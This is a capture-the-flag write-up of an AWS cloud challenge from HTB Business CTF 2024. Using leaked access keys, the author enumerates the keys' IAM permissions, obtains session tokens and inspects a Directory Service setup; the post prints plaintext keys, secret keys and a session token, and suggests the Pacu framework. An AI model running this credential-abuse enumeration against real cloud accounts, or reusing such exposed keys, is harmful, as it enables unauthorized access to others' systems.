← Back to blog

Protrude

May 18, 2024 · Hack The Box / Business CTF 2024 cloudawsaws-iamenumerate-iamaws-directoryservicepacu

Challenge

  • CTF: HTB Business CTF 2024: The Vault of Hope
  • Name: Protrude
  • Category: Cloud
  • Difficulty: Easy
  • Points: 375
  • Description: We have obtained leaked account pertaining to Vault 101, with suspicion that it may be linked to one of the leaders group. Your task is to enumerate and see if we can infiltrate them internally.

Writeup

Cloud Protrude

╰─❯ python3 enumerate-iam.py --access-key AKIAXYAFLIG2JE6MC2SY --secret-key teWVv0GzIBKS23uozxUGmUH+muE5XB86fnZmRZXu --region us-east-1
2024-05-18 14:56:38,694 - 277199 - [INFO] Starting permission enumeration for access-key-id "AKIAXYAFLIG2JE6MC2SY"
2024-05-18 14:56:39,018 - 277199 - [INFO] -- Account ARN : arn:aws:iam::532587168180:user/aalmodovar
2024-05-18 14:56:39,018 - 277199 - [INFO] -- Account Id  : 532587168180
2024-05-18 14:56:39,018 - 277199 - [INFO] -- Account Path: user/aalmodovar
2024-05-18 14:56:39,055 - 277199 - [INFO] Attempting common-service describe / list brute force.
^T2024-05-18 14:56:39,798 - 277199 - [INFO] -- dynamodb.describe_endpoints() worked!
2024-05-18 14:56:40,542 - 277199 - [ERROR] Remove globalaccelerator.describe_accelerator_attributes action
2024-05-18 14:56:40,822 - 277199 - [INFO] -- ds.describe_directories() worked!
2024-05-18 14:56:41,517 - 277199 - [INFO] -- sts.get_caller_identity() worked!
2024-05-18 14:56:42,209 - 277199 - [ERROR] Remove codedeploy.list_deployment_targets action
2024-05-18 14:56:42,249 - 277199 - [ERROR] Remove codedeploy.get_deployment_target action
2024-05-18 14:56:42,249 - 277199 - [ERROR] Remove codedeploy.batch_get_deployment_targets action
2024-05-18 14:56:42,491 - 277199 - [INFO] -- sts.get_session_token() worked!

aws sts get-session-token
Credentials:
  AccessKeyId: ASIAXYAFLIG2D3SN4IHV
  Expiration: '2024-05-19T07:14:10+00:00'
  SecretAccessKey: iAn+gnSO6ylAHZKb/Xe2qz+gwFDAjwVkKxsXzpqx
  SessionToken: IQoJb3JpZ2luX2VjEIz//////////wEaCXVzLWVhc3QtMSJIMEYCIQC7gQJPD53dDH6pEs7IKo0ldoxdo8ngNGDpqw8/rHvLZwIhALMCAUkhNN2aLmgglGRO4b1abkM8FgcwXPSpf1VqTfNwKvQBCPT//////////wEQAxoMNTMyNTg3MTY4MTgwIgxpczj2BsW6KvpjuV0qyAGGUrrnI4p+xB5lVwvuEbGbagyKskv2SnuJYP8YBjCOBVJrbUnACKIPGxPWSv24nQiZ/rIgE+/SGbja7plgzUfQRMEyFolwaBCjoGQTzGH3EW3MjBXWeaoCUfIxEc3Ko8xUfgEQq0SHns1vg8yQ1giC0gLnCShu62pPBpMF6YVluthqxY0H4iSew2eNCsllJ+ysCkAxoLFe0NUgWMuK6gxcCQmPYyW8IVv0KGQ0FcETy+7T1yWYKrcuKbjq1ivs0DewPEUI1x+m3TCC/KOyBjqXAeDB7snkSfq+W3OwUPxkY9BPfbwxLqfCAKl2X5T+8RF3Zlosai74SRXc+azOGmf/Ik0NaXs0JoUxkO6Mu2CV5ijgWJImspYXB0rUrUVnl0VD518fISWUoq5oj8xbshF5WJ8qOeLERnxiTdH28Iy+yoqBexpJMjOaOtbtE4UlO3YpyWhw337xcQaFdQVkcQ58W70oM/JKU/E=

aws dynamodb describe-endpoints
Endpoints:
- Address: dynamodb.us-east-1.amazonaws.com
  CachePeriodInMinutes: 1440

aws ds describe-directories
DirectoryDescriptions:
- AccessUrl: vault101.awsapps.com
  Alias: vault101
  DesiredNumberOfDomainControllers: 0
  DirectoryId: d-9067e0513b
  DnsIpAddrs:
  - 172.31.87.164
  - 172.31.31.15
  LaunchTime: '2024-04-28T17:47:14.630000-04:00'
  Name: vault101.wasteland.local
  ShortName: VAULT101
  Size: Small
  SsoEnabled: true
  Stage: Active
  StageLastUpdatedDateTime: '2024-04-28T17:54:13.623000-04:00'
  Type: SimpleAD
  VpcSettings:
    AvailabilityZones:
    - us-east-1a
    - us-east-1d
    SecurityGroupId: sg-0bee7f241cef79345
    SubnetIds:
    - subnet-0a5022ff1dfdf5518
    - subnet-0574f58cd2d4f85ca
    VpcId: vpc-0d7b2c5c8509574bd

aws ds describe-directories --directory-ids d-9067e0513b
DirectoryDescriptions:
- AccessUrl: vault101.awsapps.com
  Alias: vault101
  DesiredNumberOfDomainControllers: 0
  DirectoryId: d-9067e0513b
  DnsIpAddrs:
  - 172.31.87.164
  - 172.31.31.15
  LaunchTime: '2024-04-28T17:47:14.630000-04:00'
  Name: vault101.wasteland.local
  ShortName: VAULT101
  Size: Small
  SsoEnabled: true
  Stage: Active
  StageLastUpdatedDateTime: '2024-04-28T17:54:13.623000-04:00'
  Type: SimpleAD
  VpcSettings:
    AvailabilityZones:
    - us-east-1a
    - us-east-1d
    SecurityGroupId: sg-0bee7f241cef79345
    SubnetIds:
    - subnet-0a5022ff1dfdf5518
    - subnet-0574f58cd2d4f85ca
    VpcId: vpc-0d7b2c5c8509574bd

Try PACU:

docker run -it -v ~/.aws:/root/.aws rhinosecuritylabs/pacu:latest

AWS Directory Service (ds) is a web service that makes it easy for you to setup and run directories in the Amazon Web Services cloud, or connect your Amazon Web Services resources with an existing self-managed Microsoft Active Directory. This guide provides detailed information about Directory Service operations, data types, parameters, and errors. For information about Directory Services features, see Directory Service and the Directory Service Administration Guide .

Vault 101: https://vault101.awsapps.com/workdocs/loginv2/index.html#/emailSelect?sitename=vault101&check_auth_redirect=true

# Get directories and DCs
aws ds describe-directories
aws ds describe-domain-controllers --directory-id <id>
# Get directory settings
aws ds describe-trusts
aws ds describe-ldaps-settings --directory-id <id>
aws ds describe-shared-directories --owner-directory-id <id>
aws ds get-directory-limits
aws ds list-certificates --directory-id <id>
aws ds describe-certificate --directory-id <id> --certificate-id <id>

Workdocs:

https://vault101.awsapps.com/login/?client_id=06f4bdef20da505e&redirect_uri=https%3A%2F%2Fvault101.awsapps.com%2Fworkdocs%2Floginv2%2Findex.html%23%2Fenterprisecallback

[email protected]